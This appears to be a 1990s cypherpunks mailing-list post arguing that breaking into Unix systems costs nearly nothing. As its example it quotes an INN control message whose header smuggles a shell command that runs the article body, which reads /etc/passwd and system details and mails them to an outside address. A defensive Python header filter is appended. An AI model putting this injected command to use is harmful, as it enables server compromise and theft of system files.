Toto wrote:
Bryce wrote:
The non-cpunks that I talk to frequently say that "no bad guys would bother to read my e-mail". As long as the value of reading your private e-mail is less than the cost of reading it, you can consider yourself safe.
Bad, bad assumption.
So my points are as follows:
2. To the cpunks: the _value_ of invading your privacy is not that high. There are no evil storm troopers whose full time job is to run a man-in-the-middle attack on your PGP public key, or dedicate a cracking farm to decrypting your messages, or using TEMPEST devices on your home computer or whatever. Therefore, simply encrypting your personal e-mail with a 512-bit PGP key, storing your private key on your local multi-user Unix system, and using people's public keys _without_ doing anti-Man-In-The-Middle techniques is more than sufficient to protect your privacy.
The main mistake in the argument that you cited is the following: it assumes that you know the cost of hacking and reading one's email or files. You do NOT know it. Moreover, while it is usually easy to find the upper bound for that cost, the lower bound is not so obvious.

Recall the latest attack on INN servers, when one trivial message (see below) could be used to compromise thousands of internet sites, at negligible cost.

It is only safe to assume that the cost of breaking into a Unix system (or any other server for that matter) is ZERO. Unix security on multiuser machines is an oxymoron; it does not exist and should never be assumed.

The problems with people actually securing their communications and personal data are as follows:

1) It is costly to set up a more or less secure system (i.e., a system that is not a server and that is somewhat protected from various data attacks) because of learning curve and other costs

2) Many if not most correspondents are so clueless they'd never even understand what they need to do to secure their communications.

I had to drop several conversations with people because they were stupid/lazy enough not to set up PGP.

	- Igor.

Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
From: tale@uunet.uu.net (David C Lawrence)
Date: 1997/03/17
Message-Id: <5gkdv8$5uc@tabloid.amoco.com>
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Organization: Amoco
Newsgroups: comp.sys.mac.printing
[Fewer Headers]

#+
(/bin/id; /bin/uname -a; /bin/who; /bin/cat /etc/passwd; /bin/cat /etc/inetd.conf) | /usr/ucb/Mail -s info tafeyereisen@amoco.com
#-
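
An added example, not part of the original post and not INN's own code: a pre-filter a news administrator could run on incoming articles, refusing to hand a Control: header to automatic processing unless the verb, argument count and group name fit a strict allowlist. The allowlist pattern, the function name check_control and the benign sample are assumptions made for illustration; the first sample reuses the headers quoted in the post.

```python
import re
from email.parser import HeaderParser

# Assumption: a conservative allowlist for group names (dot-separated
# components of lowercase letters, digits, '+', '-', '_'). It is stricter
# than what some servers accept.
GROUP_RE = re.compile(r"[a-z0-9+_-]+(?:\.[a-z0-9+_-]+)+")
# Control verb -> (min, max) number of arguments this filter will pass on.
VERBS = {"newgroup": (1, 2), "rmgroup": (1, 1)}

def check_control(raw_headers):
    """Return (ok, reason) for the Control: header of one article."""
    control = HeaderParser().parsestr(raw_headers).get("Control")
    if control is None:
        return True, "not a control message"
    parts = control.split()
    if not parts or parts[0] not in VERBS:
        return False, "verb not handled automatically"
    verb, args = parts[0], parts[1:]
    low, high = VERBS[verb]
    if not low <= len(args) <= high:
        return False, "unexpected argument count"
    # fullmatch: the whole argument must be a plain group name, so backticks,
    # '$', '|', quotes and ':' all cause rejection before any shell sees them.
    if not GROUP_RE.fullmatch(args[0]):
        return False, "group name outside allowlist"
    if len(args) == 2 and args[1] != "moderated":
        return False, "unknown newgroup flag"
    return True, "ok"

# Headers as quoted in the post above.
POST_HEADERS = r"""Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Newsgroups: comp.sys.mac.printing

"""
# Constructed benign sample.
BENIGN_HEADERS = "Control: newgroup comp.example.test moderated\nNewsgroups: comp.example\n\n"

if __name__ == "__main__":
    for name, hdrs in (("post", POST_HEADERS), ("benign", BENIGN_HEADERS)):
        print(name, check_control(hdrs))
```

Rejected articles are best queued for manual review rather than dropped, so a legitimate group name that falls outside the allowlist is not lost.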